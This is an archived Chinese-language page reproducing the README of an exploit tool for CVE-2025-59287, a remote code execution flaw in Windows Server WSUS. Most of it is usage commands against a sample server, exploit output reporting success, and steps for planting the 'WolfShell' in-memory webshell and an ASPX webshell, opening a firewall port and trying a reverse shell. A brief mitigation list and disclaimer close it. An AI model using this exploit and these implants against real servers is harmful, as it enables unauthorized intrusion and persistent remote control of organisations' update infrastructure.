POC详情: 6cc446280feaab368523e307934e9ff29ef99010

来源
关联漏洞
标题: Microsoft Windows Server 代码问题漏洞 (CVE-2025-59287)
描述:Microsoft Windows Server是美国微软(Microsoft)公司的一套服务器操作系统。 Microsoft Windows Server存在代码问题漏洞,该漏洞源于攻击者利用该漏洞可以远程执行代码。
描述
CVE-2025-59287  注入WolfShell内存马
介绍

## CVE-2025-59287 WSUS漏洞复现

CVE-2025-59287 — 注入 WolfShell 金刚狼 正向内存马


### 概要
CVE-2025-59287 利用 WSUS 相关组件的逻辑缺陷,将 WolfShell 内存马注入到目标服务器。当管理员打开 WSUS 控制台时(默认随机时间1-30分钟内触发),内存马会触发并导致远程代码执行(RCE)。本文档包含利用示例、所需文件与防护建议。


### 用法示例

#### 用法

向目标服务器发送ysoserial.net反序列化payload,功能自定义,本项目演示植入金刚狼内存马

```
Usage: CVE-2025-59287 <target_url> <payload_file>
```

#### 植入金刚狼WebShell ASPX马 示例
```
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt
```

#### 内存植入金刚狼WolfShell正向马 示例
```
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters

[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS
```
#### 防火墙放行7556端 示例
```
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt
```

![exp](https://raw.githubusercontent.com/0x7556/CVE-2025-59287/main/exp.png)  


#### PowerShell反弹shell
win2019 Defender 拦截查杀 无法使用
![Defende](https://raw.githubusercontent.com/0x7556/CVE-2025-59287/main/defen.png)  

#### 打开WSUS控制台 触发漏洞
如图 成功监听 7556 端口 说明 金刚狼内存正向马 已植入
![WolfDoor 1](https://raw.githubusercontent.com/0x7556/CVE-2025-59287/main/wolfdoor.png)  

#### 金刚狼连接 内存马 执行CMD命令 
![WolfDoor 2](https://raw.githubusercontent.com/0x7556/CVE-2025-59287/main/wolf.door.PNG)


### 防护建议
- 立即应用厂商提供的补丁或临时缓解措施到受影响的 WSUS 服务器。  
- 检查并移除 WSUS 中的可疑客户端(例如 hawktrace.local)。  
- 限制并审计对 WSUS 管理控制台的访问,确保仅可信管理员能访问。  
- 使用入侵检测、内存扫描与主机完整性监控工具检测异常内存马或可疑模块。  
- 在补丁到位前,避免在不信任环境下打开 WSUS 控制台或处理可疑更新项。

### 免责声明
本文档仅用于安全研究与防护目的。请勿将相关利用代码用于未经授权的系统或攻击活动。

### 参考链接

https://github.com/0x7556/wolfshell
https://github.com/0x7556/CVE-2025-59287




文件快照

[4.0K] /data/pocs/6cc446280feaab368523e307934e9ff29ef99010 ├── [ 16K] allow7556.txt ├── [3.4M] CVE-2025-59287.exe ├── [ 78K] defen.png ├── [ 26K] exp.png ├── [2.6K] README.md ├── [ 16K] wolfaspx.txt ├── [ 48K] wolfdoor.png ├── [158K] wolf.door.PNG └── [ 18K] wolfshell.txt 0 directories, 9 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。